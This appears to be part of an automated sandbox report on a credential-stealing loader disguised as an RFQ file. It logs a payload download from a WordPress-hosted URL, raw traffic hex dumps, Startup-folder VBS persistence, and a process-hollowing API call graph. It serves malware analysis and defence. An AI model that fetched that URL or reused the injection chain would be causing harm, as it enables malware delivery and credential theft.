                                                        2025-01-09 18:02:08 UTC8000INData Raw: eb 5f 4a 85 1c ad 10 9c 08 13 4a 10 2f 46 42 b4 54 6f d7 80 99 ff b0 3f 7c e5 ee 09 98 e6 3a 0e 03 a5 53 a8 93 9d ef 0d bb e6 19 99 98 37 da 60 1d e3 bd d0 a0 e5 90 a3 70 23 dd 40 b6 ca b5 87 d8 f8 2e 0e 63 be a2 d0 43 5c 12 3c f8 e0 c0 47 f3 2b 3e 94 18 e8 08 71 35 04 29 89 bb f4 45 e2 8b 76 8d aa ac e7 4c f4 a3 1b be 8f 99 a4 3d 5e bb f1 c3 a7 a3 61 0f a7 a7 39 15 30 95 8d 71 b7 0a 5e 7e 95 58 f3 5b dc 80 81 49 44 62 c1 73 44 f0 c5 3d ed c7 14 47 2e da cd 80 f0 51 b3 3b 4d b8 49 3e c1 22 15 8e d8 61 ae 93 15 2e b6 aa d4 82 71 00 b8 b4 52 8b 4b 4a 72 2c e4 20 9d 44 19 26 00 9f 71 94 b3 bc 09 e0 77 20 ea dd 11 69 b1 9b 44 9a d0 9e 44 38 e2 9d 55 9e 35 74 24 f5 6a dd 86 1d c1 51 1f b9 48 47 cf e1 e1 6e 06 bf 28 da ac a4 a9 7e d4 d0 01 4e 42 d4 1e ee 26 e0
                                                        Data Ascii: _JJ/FBTo?|:S7`p#@.cC\<G+>q5)EvL=^a90q^~X[IDbsD=G.Q;MI>"a.qRKJr, D&qw iDD8U5t$jQHGn(~NB&


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.849711209.58.149.2254437992C:\Users\user\AppData\Roaming\AuditFlags.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-09 18:02:25 UTC98OUTGET /wp-panel/uploads/Mqdwogssw.vdf HTTP/1.1
                                                        Host: www.chirreeirl.com
                                                        Connection: Keep-Alive
                                                        2025-01-09 18:02:25 UTC184INHTTP/1.1 200 OK
                                                        Date: Thu, 09 Jan 2025 18:02:25 GMT
                                                        Server: Apache
                                                        Last-Modified: Mon, 30 Dec 2024 00:09:57 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1298440
                                                        Connection: close
                                                        2025-01-09 18:02:25 UTC8008INData Raw: d7 61 6f 83 ad 0d ad 9e 98 50 87 af 1c 92 e1 fe 11 fd bc 5f 75 76 e9 f4 df f4 8b 95 89 8e 9c 29 21 c0 18 5b c0 94 8f 20 bf 0d 9b 0c 33 8c cb 87 31 48 62 e0 b0 00 39 67 a4 6d fb 97 2b f9 2f 77 6a 93 4a 6b 7a e0 f2 44 11 47 16 a4 17 cd 03 3b 46 b2 3e 11 b5 93 e5 1f b3 9d 72 6d a6 65 33 b9 04 a3 0f 31 d0 f1 dd c0 d1 21 fb ed f4 69 0a 57 47 e6 4e 58 ef 1a 60 fc 07 ed 69 ab 58 29 dc 40 9f 45 f5 a7 94 4f 41 02 9a 14 2d 7b 40 0d 74 87 a1 0a d1 ee 96 c5 0c 01 2d 4b f3 55 c1 7e e5 1c 81 c6 f2 04 9a 7b b2 e9 67 9b af e6 11 06 3d 35 51 d0 52 c0 42 5c d3 87 e8 1c 40 d6 01 70 8d 6b 7b 1b 09 22 b2 a5 13 ef 58 93 a9 94 49 c7 d5 ac 33 f1 c1 29 05 18 33 1f ee 4f 7d 6e 44 81 d3 c7 00 a0 47 93 89 86 41 01 aa 43 75 4c fe 99 87 bf 27 09 8e a5 86 35 7a 7d 21 b9 0b 74 2d db 7f
                                                        Data Ascii: aoP_uv)![ 31Hb9gm+/wjJkzDG;F>rme31!iWGNX`iX)@EOA-{@t-KU~{g=5QRB\@pk{"XI3)3O}nDGACuL'5z}!t-
                                                        2025-01-09 18:02:25 UTC8000INData Raw: 70 cd 51 5d 71 10 14 8f 1a 32 70 c6 ee fa d4 43 04 a7 1f 4b ad f6 70 78 b7 fa fd 10 ad 96 8e de 43 82 5f aa b8 e2 3b 4e c0 60 d3 6a 0a af 51 b7 ce be b7 ac 6f b7 e3 1b de b0 0b d0 d9 d9 b7 e1 ad ec 85 fc 48 99 14 e7 56 35 8a 58 26 d8 eb 71 08 40 7a f1 df ce 1f 6f 29 4f cc 8c 24 20 16 c1 ef 57 c8 21 7d 91 85 cb f0 f0 58 48 67 85 6b 2c 77 42 cc 09 57 db 69 ed 77 a8 10 fc a8 9d 43 45 b6 23 e7 22 39 0d 99 34 e4 69 5a f2 78 bc f4 e3 b0 3e b9 fd d8 44 c0 a5 2b 14 63 0c f6 4e 00 58 25 64 6d 8e 87 91 d9 4f aa 6b 7e de 3d 04 8b b3 1a b0 e7 9a 94 24 bd 8a 7b 05 46 e6 f3 f1 87 93 92 0f fb c5 ed 2b 83 8b e4 ae a8 fe bb 4d e8 de ab 10 c6 b2 f9 47 cc 66 cb 0a ba dd 6b a4 0c 02 e8 86 10 76 93 0a 88 36 0e ce 44 09 9c ea bf 17 90 98 ee d1 03 83 65 93 02 24 8e d2 0b 6f ab
                                                        Data Ascii: pQ]q2pCKpxC_;N`jQoHV5X&q@zo)O$ W!}XHgk,wBWiwCE#"94iZx>D+cNX%dmOk~=${F+MGfkv6De$o
                                                        2025-01-09 18:02:25 UTC8000INData Raw: 22 6a 38 40 ab 4b 0b 08 9a ed 94 ad 7f d3 b4 2e 2e 1e 03 72 42 e2 25 73 a9 4c b6 47 13 80 79 ac 9c a1 8c ff ec 40 a5 32 64 f3 ab 14 59 ef 24 a6 10 b3 67 35 78 91 21 b7 f4 62 2c 26 db 31 f4 a5 30 61 96 a6 ee 79 2a 9c f4 27 ac b0 0f 9e 6f 79 11 d4 ee 2f 32 7e e0 ef fe 8e d6 7b 9e fe 77 8b b2 42 4c 0a d1 b7 e2 95 63 01 fb 42 45 c0 5f fc 7d 7b a2 d9 64 cd 51 e2 f4 5d d8 d2 cb f8 79 4d c6 67 09 89 a1 1e 3e 3b a5 80 fd 73 11 68 3c 04 28 30 14 1b f7 90 ab 38 2e b4 41 b9 10 71 e8 d5 bd 84 ea a5 2f 32 21 93 9c ad 25 68 80 ff 43 54 9e 1f cc a6 09 88 5d 93 db 97 f0 92 e4 a7 12 58 6f 0b ef e5 a1 25 d6 de c7 d3 d9 05 70 45 19 dc 0a 37 b8 a8 93 40 8e 07 60 63 c6 23 a7 dd 98 df a0 1a e4 89 6b 38 3e d2 9c a5 7c 0f 89 a6 a5 b4 f6 9f 5f 83 1c f0 e9 bb 64 84 56 02 fc 99 00
                                                        Data Ascii: "j8@K..rB%sLGy@2dY$g5x!b,&10ay*'oy/2~{wBLcBE_}{dQ]yMg>;sh<(08.Aq/2!%hCT]Xo%pE7@`c#k8>|_dV
                                                        2025-01-09 18:02:25 UTC8000INData Raw: ad 18 ff e7 be 04 fd 7c 9c d2 02 7d 1d 69 dd 63 68 d7 7d 51 37 4e 46 8e d0 9a 43 3f c1 14 3f 33 f4 9a a0 8a 5a 7e c8 9b e6 8a 4f ea 8f 42 0d 54 ff ce 90 29 af b0 5b dd f6 79 f2 e4 74 f9 b2 0f 78 3e ec 92 1c 3d 0c 35 f0 e3 8f 61 ef 20 29 66 e8 a2 4f 68 9e 69 92 02 d6 a2 7e 11 05 98 94 42 a0 95 14 09 f7 00 28 04 06 10 40 b3 6a 61 e9 c7 d8 a8 15 d2 71 ee ae b8 9c 2f eb 5f b3 7d e0 b8 19 cf 77 cb 67 bf 3f ea 5b 57 5d ac a8 13 8b 24 66 8e 4e e1 89 73 1d 79 e4 c4 20 64 3c c9 4f dc 96 c6 38 c5 a3 e4 ee ac 22 fe 55 05 6a 6d 4b 84 0a ef 7b a3 9b ef fd d0 80 d4 c0 91 cd 7a 04 33 25 3c 48 24 e3 f0 4e 62 55 73 ca 23 88 8b 6d 63 ae fc 5d 5f c6 43 0d 1d 39 8e 45 c1 e9 e3 e7 96 f5 ca f7 a1 e7 ff 80 ca 5e 91 d8 53 0a bb e7 04 11 82 0c 5f 7b c1 57 dc d0 65 ba f5 f3 03 d7
                                                        Data Ascii: |}ich}Q7NFC??3Z~OBT)[ytx>=5a )fOhi~B(@jaq/_}wg?[W]$fNsy d<O8"UjmK{z3%<H$NbUs#mc]_C9E^S_{We
                                                        2025-01-09 18:02:25 UTC8000INData Raw: 97 b3 b0 74 11 25 82 77 64 83 1f 20 87 50 bd 7b 99 13 d8 af 07 28 02 37 fe 64 c8 75 16 9d ec 12 9f e6 0a 13 8e dd 43 c7 63 41 67 7a 30 21 f0 84 0f dd ad 4c 30 5a a5 96 cc c9 c7 29 4e 45 02 45 d7 05 3f 78 5d f7 a4 2f 5d 5d d0 34 c5 e5 3a d4 d6 30 ae ec 21 f4 77 c2 15 3d a8 49 b4 0b 2f a4 41 92 5b 27 7a 68 82 45 f3 41 75 62 e6 30 81 e7 3b a4 5e 46 1a 7d 20 b7 22 29 93 3c d7 ce 62 49 cf 64 20 8e d9 50 32 6c 29 4d cc df 32 72 25 0f 12 87 78 a3 59 21 02 e2 6f 0f e3 c2 19 63 ec 9a e5 3a 03 88 28 25 d8 0e 0f 30 10 10 96 f9 a1 f1 0c e9 e8 8b a6 36 c1 de 99 1c b5 0a 6d 2a ba 3b d4 26 e4 24 5f 4b ed 1e 12 a4 ca b7 11 02 fd 42 e2 4c 76 09 a6 df 48 5c 7d 4a c8 a1 9c 02 53 ad 4f 2a 8d 3d c8 a0 f9 5a 7f 9f 5b c2 ec 54 4b 11 f9 d9 95 15 2e ec 0f 9b f7 0f 8e 7f c5 f5 ae
                                                        Data Ascii: t%wd P{(7duCcAgz0!L0Z)NEE?x]/]]4:0!w=I/A['zhEAub0;^F} ")<bId P2l)M2r%xY!oc:(%06m*;&$_KBLvH\}JSO*=Z[TK.
                                                        2025-01-09 18:02:25 UTC8000INData Raw: 8e 3b 82 ed 35 6c de e5 75 ea 1d 4b 1c b5 32 a8 21 d8 0a ed 61 f2 79 a6 64 f8 3c 63 7e 6d 41 7b a0 6e 23 a3 18 97 20 9b 23 0c 23 00 e2 4c 4d b7 cd 9a d8 88 55 fc 88 17 17 9b 5c dc f4 c4 bf f3 9f 47 31 32 59 ac 18 d7 79 76 a5 92 03 48 bd cb 76 42 54 b7 20 9f f0 d5 dc 42 19 16 85 f9 35 d4 95 23 6d c4 dc 8b ab d9 25 46 b4 8d 64 33 83 16 9d 3d 71 2f 6b 61 66 0c 4a 49 d4 35 16 09 80 f9 99 66 07 fe 03 27 82 22 24 ee ad b0 e3 53 81 9a c6 ad 4d 10 d3 df 9b 5a 77 39 d7 21 e1 79 e6 32 2b 5e d7 c0 2c 94 af 78 5f 5d 06 84 ef 64 eb da e9 e3 51 90 19 a5 fb bd b9 6e a1 aa f9 b0 af 45 0d a5 07 4c 83 b1 da 89 a6 89 ed 26 3c be 3c e9 65 45 8d ae 62 48 0b 4e 8a e4 41 07 05 e1 8e 56 07 7c af e9 f4 03 58 fe 3f f0 be d1 89 b7 c4 d3 16 b9 1f 35 45 c0 c5 1c c0 c7 ed c8 d0 71 59
                                                        Data Ascii: ;5luK2!ayd<c~mA{n# ##LMU\G12YyvHvBT B5#m%Fd3=q/kafJI5f'"$SMZw9!y2+^,x_]dQnEL&<<eEbHNAV|X?5EqY
                                                        2025-01-09 18:02:25 UTC8000INData Raw: e9 df 82 b2 59 d9 a6 6a 02 7a 53 4a 66 87 2a b5 f4 4a d7 de f7 1b 9f f7 43 5d 8b 9f 78 bf 9b e1 fd 22 8b 28 51 ec 18 93 30 a4 2d 12 0b 3d d3 ec a0 94 70 a6 dc 97 f9 52 20 ff 89 9d f6 f4 7b c2 38 89 51 c6 4d 92 f0 c6 b3 a4 35 b3 e8 13 6d 31 12 37 87 96 a6 b5 05 48 0e eb b4 1c bd 46 d0 c4 fc 81 91 a5 69 87 57 83 1c 05 bf 86 01 d4 ce 5d a9 d5 a8 20 20 41 dc 6f 8b 38 9f 66 8c d3 61 01 8e 2f 9c 63 28 0e 26 19 f9 85 63 dc a0 f1 e7 53 96 25 22 97 6f 90 34 47 97 6b 64 ed b4 35 01 55 99 c8 f6 47 3e 83 6b 39 15 c9 03 aa de 82 b3 eb f4 fe 8a 89 4a 01 56 06 50 88 52 9d df 5c ea 31 89 e6 fe 6e 5f 5f 78 87 bf 86 fd 84 a0 97 69 53 88 70 d6 b8 ff fd 4a 16 95 9d 89 85 95 48 2c b7 f3 b8 13 3b 26 50 c6 86 b7 b2 58 e3 aa 22 05 4a 00 80 8c 73 d6 3e 16 ac 40 75 65 b4 51 e7 59
                                                        Data Ascii: YjzSJf*JC]x"(Q0-=pR {8QM5m17HFiW] Ao8fa/c(&cS%"o4Gkd5UG>k9JVPR\1n__xiSpJH,;&PX"Js>@ueQY
                                                        2025-01-09 18:02:25 UTC8000INData Raw: c7 e6 66 55 05 4f b3 0e 16 93 35 72 09 29 73 b3 f5 09 d4 82 3f 98 73 56 5a 2a 8a 55 d7 a5 b0 6b 5d 92 1f fe 7a ae 7b fc 25 bf 3b bd e4 00 2c 53 40 a2 8d 91 30 c9 cd 41 f8 96 bf 9e 85 2e c2 a0 e8 0f c6 da 8d c3 7c 35 f8 27 c2 2c a6 85 08 ed fa 22 5a 63 98 d6 35 ce d7 36 68 01 9d 94 97 63 ef 4e 19 96 4e 8f 22 ed 77 8f eb 3a 70 e8 a7 31 52 da e9 50 dc 2e 48 64 e6 c7 3a a0 e6 3c f7 e8 62 f0 d6 ea 0c 02 4e 6e 11 d3 93 4d 15 dc 49 15 9a e6 27 6f b6 13 a5 42 6b c5 c8 ab a9 20 f4 90 92 75 08 83 c9 27 e1 ef 9c a6 92 6e 6c 12 e6 02 a3 f1 bb d6 79 3d fe 61 3c c5 27 bc c7 40 3b f0 7d ac dd 0a e0 68 f9 5b 48 1e 51 6c 5e bc a3 fa 03 f9 c5 90 eb 11 e7 3a cc e9 3d 16 0e 56 64 b6 25 56 19 a2 59 26 2d 89 02 35 c1 27 15 f0 e5 a8 91 ab f2 0d ea 27 19 b3 aa 3b 57 e4 93 22 8d
                                                        Data Ascii: fUO5r)s?sVZ*Uk]z{%;,S@0A.|5',"Zc56hcNN"w:p1RP.Hd:<bNnMI'oBk u'nly=a<'@;}h[HQl^:=Vd%VY&-5'';W"
                                                        2025-01-09 18:02:25 UTC8000INData Raw: 2a ae d6 eb a8 64 80 9f 1b ec ea c5 0b ee e2 16 2e 7f be 8a 92 a8 85 86 31 f1 01 23 0b 04 b2 fb 4e 27 25 8e 64 10 34 b9 f3 ae 5b 68 39 2c 8f 3c 82 43 c1 64 ac 23 e2 08 6e 54 e4 c2 21 8f 4f 2a f1 bf bd 35 f8 8d 15 ed 01 23 fa 17 86 ce 96 c2 dd f7 c1 85 cf 39 95 88 b3 19 4c 62 06 e0 b0 cc d5 78 72 bb 79 14 7a 53 5c 92 a6 bc 31 c2 da fe 3d 13 46 92 f2 44 f5 76 4c 76 c1 3a cd de 3c e5 ee e0 a5 aa db ce d6 4c 3f 1a 70 b7 eb fe 2e b8 8b 3f 7f 17 32 4f b6 61 7b 7d 3b 05 71 a7 d8 d8 11 60 ad b0 4f 00 d2 1e ce 6b 7f d5 ca f8 f8 eb 6d de c0 a9 1f fa 7a 69 c5 ba c1 8a db 54 83 18 55 6b 3a d3 39 51 88 de 32 73 c2 7d 45 cc 89 3d bd 1a 95 4f 88 27 74 25 1d fa 66 ce 90 77 4d 44 5b 4e 3b d5 68 21 6c 14 6d a2 94 9e 69 f3 25 56 4e 37 c1 ab 20 33 6a 2f f5 ac 11 7e 88 5c 55
                                                        Data Ascii: *d.1#N'%d4[h9,<Cd#nT!O*5#9LbxryzS\1=FDvLv:<L?p.?2Oa{};q`OkmziTUk:9Q2s}E=O't%fwMD[N;h!lmi%VN7 3j/~\U
                                                        2025-01-09 18:02:25 UTC8000INData Raw: eb 5f 4a 85 1c ad 10 9c 08 13 4a 10 2f 46 42 b4 54 6f d7 80 99 ff b0 3f 7c e5 ee 09 98 e6 3a 0e 03 a5 53 a8 93 9d ef 0d bb e6 19 99 98 37 da 60 1d e3 bd d0 a0 e5 90 a3 70 23 dd 40 b6 ca b5 87 d8 f8 2e 0e 63 be a2 d0 43 5c 12 3c f8 e0 c0 47 f3 2b 3e 94 18 e8 08 71 35 04 29 89 bb f4 45 e2 8b 76 8d aa ac e7 4c f4 a3 1b be 8f 99 a4 3d 5e bb f1 c3 a7 a3 61 0f a7 a7 39 15 30 95 8d 71 b7 0a 5e 7e 95 58 f3 5b dc 80 81 49 44 62 c1 73 44 f0 c5 3d ed c7 14 47 2e da cd 80 f0 51 b3 3b 4d b8 49 3e c1 22 15 8e d8 61 ae 93 15 2e b6 aa d4 82 71 00 b8 b4 52 8b 4b 4a 72 2c e4 20 9d 44 19 26 00 9f 71 94 b3 bc 09 e0 77 20 ea dd 11 69 b1 9b 44 9a d0 9e 44 38 e2 9d 55 9e 35 74 24 f5 6a dd 86 1d c1 51 1f b9 48 47 cf e1 e1 6e 06 bf 28 da ac a4 a9 7e d4 d0 01 4e 42 d4 1e ee 26 e0
                                                        Data Ascii: _JJ/FBTo?|:S7`p#@.cC\<G+>q5)EvL=^a90q^~X[IDbsD=G.Q;MI>"a.qRKJr, D&qw iDD8U5t$jQHGn(~NB&


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:13:02:05
                                                        Start date:09/01/2025
                                                        Path:C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exe"
                                                        Imagebase:0xcb0000
                                                        File size:24'576 bytes
                                                        MD5 hash:A451E1EAD24BD11248F2365A292FB822
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1479490419.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1465657155.0000000003057000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:13:02:10
                                                        Start date:09/01/2025
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0x5e0000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:4
                                                        Start time:13:02:22
                                                        Start date:09/01/2025
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbs"
                                                        Imagebase:0x7ff6172a0000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:13:02:23
                                                        Start date:09/01/2025
                                                        Path:C:\Users\user\AppData\Roaming\AuditFlags.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\AuditFlags.exe"
                                                        Imagebase:0x670000
                                                        File size:24'576 bytes
                                                        MD5 hash:A451E1EAD24BD11248F2365A292FB822
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.1622157833.0000000002967000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 61%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:13:02:26
                                                        Start date:09/01/2025
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0x830000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1784098344.0000000002B93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:9.7%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:13.1%
                                                          Total number of Nodes:222
                                                          Total number of Limit Nodes:10
                                                          execution_graph 57685 65d1e88 57686 65d1e9d 57685->57686 57687 65d1eb3 57686->57687 57689 65d4680 57686->57689 57690 65d3057 57689->57690 57691 65d4bf2 57689->57691 57690->57687 57694 65d78c4 57691->57694 57698 65d78d0 57691->57698 57695 65d78ca CopyFileA 57694->57695 57697 65d7a5d 57695->57697 57700 65d792c CopyFileA 57698->57700 57701 65d7a5d 57700->57701 57759 66d2588 57760 66d25d7 NtProtectVirtualMemory 57759->57760 57762 66d264f 57760->57762 57763 65d8928 57764 65d893d 57763->57764 57767 65d8953 57764->57767 57768 65d8e19 57764->57768 57773 65d8c8a 57764->57773 57769 65d89c5 57768->57769 57770 65d8c8b 57768->57770 57778 65d9f40 57770->57778 57783 65d9f30 57770->57783 57774 65d8c90 57773->57774 57776 65d9f40 10 API calls 57774->57776 57777 65d9f30 10 API calls 57774->57777 57775 65d89c5 57776->57775 57777->57775 57779 65d9f55 57778->57779 57788 65da78c 57779->57788 57794 65da600 57779->57794 57784 65d9f40 57783->57784 57786 65da78c 10 API calls 57784->57786 57787 65da600 10 API calls 57784->57787 57785 65d9f77 57785->57769 57786->57785 57787->57785 57791 65da403 57788->57791 57789 65d9f77 57789->57769 57790 65da636 57791->57789 57799 65dac70 57791->57799 57814 65dac60 57791->57814 57795 65da603 57794->57795 57797 65dac70 10 API calls 57795->57797 57798 65dac60 10 API calls 57795->57798 57796 65da636 57797->57796 57798->57796 57800 65dac85 57799->57800 57801 65daca7 57800->57801 57829 65dbe52 57800->57829 57834 65db9b1 57800->57834 57840 65db3f6 57800->57840 57845 65daf7b 57800->57845 57850 65dbafb 57800->57850 57857 65dae58 57800->57857 57862 65dbb7f 57800->57862 57867 65db302 57800->57867 57872 65db5a5 57800->57872 57877 65dbde8 57800->57877 57882 65db708 57800->57882 57887 65db68f 57800->57887 57801->57790 57815 65dac85 57814->57815 57816 65daca7 57815->57816 57817 65dbb7f 2 API calls 57815->57817 57818 65dae58 2 API calls 57815->57818 57819 65dbafb 2 API calls 57815->57819 57820 65daf7b 2 API calls 57815->57820 57821 65db3f6 2 API calls 57815->57821 57822 65db9b1 2 API calls 57815->57822 57823 65dbe52 2 API calls 57815->57823 57824 65db68f 2 API calls 57815->57824 57825 65db708 2 API calls 57815->57825 57826 65dbde8 2 API calls 57815->57826 57827 65db5a5 2 API calls 57815->57827 57828 65db302 2 API calls 57815->57828 57816->57790 57817->57816 57818->57816 57819->57816 57820->57816 57821->57816 57822->57816 57823->57816 57824->57816 57825->57816 57826->57816 57827->57816 57828->57816 57830 65dad87 57829->57830 57831 65db5a5 57829->57831 57893 66d44bb 57831->57893 57897 66d44c0 57831->57897 57835 65db9be 57834->57835 57836 65db70b 57834->57836 57901 66d3e08 57836->57901 57905 66d3e00 57836->57905 57837 65db747 57841 65db403 57840->57841 57842 65dad87 57841->57842 57843 66d44bb VirtualAllocEx 57841->57843 57844 66d44c0 VirtualAllocEx 57841->57844 57843->57842 57844->57842 57846 65daf8a 57845->57846 57909 66d47b8 57846->57909 57913 66d47c0 57846->57913 57847 65dad87 57851 65dbb13 57850->57851 57917 65dc5e3 57851->57917 57922 65dc5f0 57851->57922 57926 65dc5a8 57851->57926 57930 65dc598 57851->57930 57852 65dad87 57858 65dae72 57857->57858 57860 66d47b8 WriteProcessMemory 57858->57860 57861 66d47c0 WriteProcessMemory 57858->57861 57859 65dad87 57860->57859 57861->57859 57863 65dbfa4 57862->57863 57947 66d4e99 57863->57947 57951 66d4ea0 57863->57951 57864 65dbfe0 57864->57801 57868 65db311 57867->57868 57870 66d47b8 WriteProcessMemory 57868->57870 57871 66d47c0 WriteProcessMemory 57868->57871 57869 65db382 57869->57801 57870->57869 57871->57869 57873 65db5af 57872->57873 57875 66d44bb VirtualAllocEx 57873->57875 57876 66d44c0 VirtualAllocEx 57873->57876 57874 65dad87 57875->57874 57876->57874 57878 65dbdf7 57877->57878 57880 66d3e08 Wow64SetThreadContext 57878->57880 57881 66d3e00 Wow64SetThreadContext 57878->57881 57879 65dbe23 57880->57879 57881->57879 57883 65db710 57882->57883 57885 66d3e08 Wow64SetThreadContext 57883->57885 57886 66d3e00 Wow64SetThreadContext 57883->57886 57884 65db747 57885->57884 57886->57884 57888 65dad87 57887->57888 57889 65dbf7e 57887->57889 57891 66d4e99 NtResumeThread 57889->57891 57892 66d4ea0 NtResumeThread 57889->57892 57890 65dbfe0 57890->57801 57891->57890 57892->57890 57894 66d44c0 VirtualAllocEx 57893->57894 57896 66d457c 57894->57896 57896->57830 57898 66d4504 VirtualAllocEx 57897->57898 57900 66d457c 57898->57900 57900->57830 57902 66d3e51 Wow64SetThreadContext 57901->57902 57904 66d3ec9 57902->57904 57904->57837 57906 66d3e08 Wow64SetThreadContext 57905->57906 57908 66d3ec9 57906->57908 57908->57837 57910 66d47c0 WriteProcessMemory 57909->57910 57912 66d48a5 57910->57912 57912->57847 57914 66d480c WriteProcessMemory 57913->57914 57916 66d48a5 57914->57916 57916->57847 57918 65dc5eb 57917->57918 57919 65dc657 57917->57919 57920 65dc629 57918->57920 57934 65dd03c 57918->57934 57920->57852 57923 65dc607 57922->57923 57924 65dc629 57923->57924 57925 65dd03c 2 API calls 57923->57925 57924->57852 57925->57924 57927 65dc5ba 57926->57927 57927->57852 57928 65dc629 57927->57928 57929 65dd03c 2 API calls 57927->57929 57928->57852 57929->57928 57932 65dc59b 57930->57932 57931 65dc629 57931->57852 57932->57852 57932->57931 57933 65dd03c 2 API calls 57932->57933 57933->57931 57935 65dd04b 57934->57935 57939 66d3548 57935->57939 57943 66d3543 57935->57943 57940 66d35c8 CreateProcessA 57939->57940 57942 66d37c4 57940->57942 57944 66d3548 CreateProcessA 57943->57944 57946 66d37c4 57944->57946 57948 66d4ea0 NtResumeThread 57947->57948 57950 66d4f40 57948->57950 57950->57864 57952 66d4ee9 NtResumeThread 57951->57952 57954 66d4f40 57952->57954 57954->57864 57658 65f9318 57659 65f932d 57658->57659 57665 65f9760 57659->57665 57670 65f9752 57659->57670 57675 65f9c4a 57659->57675 57680 65f97ef 57659->57680 57660 65f9343 57667 65f978a 57665->57667 57666 65f97fc 57666->57660 57667->57666 57668 65fdad1 VirtualProtect 57667->57668 57669 65fdb30 VirtualProtect 57667->57669 57668->57667 57669->57667 57672 65f9760 57670->57672 57671 65f97fc 57671->57660 57672->57671 57673 65fdad1 VirtualProtect 57672->57673 57674 65fdb30 VirtualProtect 57672->57674 57673->57672 57674->57672 57677 65f97d6 57675->57677 57676 65f97fc 57676->57660 57677->57676 57678 65fdad1 VirtualProtect 57677->57678 57679 65fdb30 VirtualProtect 57677->57679 57678->57677 57679->57677 57682 65f97d6 57680->57682 57681 65f97fc 57681->57660 57682->57681 57683 65fdad1 VirtualProtect 57682->57683 57684 65fdb30 VirtualProtect 57682->57684 57683->57682 57684->57682 57702 16d1c30 57703 16d1c4c 57702->57703 57709 16d1c5c 57703->57709 57710 16d6969 57703->57710 57714 16d4181 57703->57714 57719 16d841b 57703->57719 57722 16d29cb 57703->57722 57726 16d4119 57703->57726 57711 16d6991 57710->57711 57730 16df848 57711->57730 57715 16d4122 57714->57715 57716 16d419a 57715->57716 57718 16df848 VirtualProtect 57715->57718 57717 16d4133 57718->57717 57721 16df848 VirtualProtect 57719->57721 57720 16d8439 57721->57720 57738 63b0d71 57722->57738 57742 63b0d80 57722->57742 57723 16d29ef 57727 16d4122 57726->57727 57729 16df848 VirtualProtect 57727->57729 57728 16d4133 57729->57728 57732 16df86f 57730->57732 57734 16dfd28 57732->57734 57735 16dfd71 VirtualProtect 57734->57735 57737 16d28c1 57735->57737 57739 63b0d95 57738->57739 57746 63b0dc0 57739->57746 57743 63b0d95 57742->57743 57745 63b0dc0 2 API calls 57743->57745 57744 63b0dad 57744->57723 57745->57744 57748 63b0df7 57746->57748 57747 63b0dad 57747->57723 57751 63b0ed8 57748->57751 57755 63b0ed0 57748->57755 57752 63b0f1c VirtualAlloc 57751->57752 57754 63b0f89 57752->57754 57754->57747 57756 63b0ed8 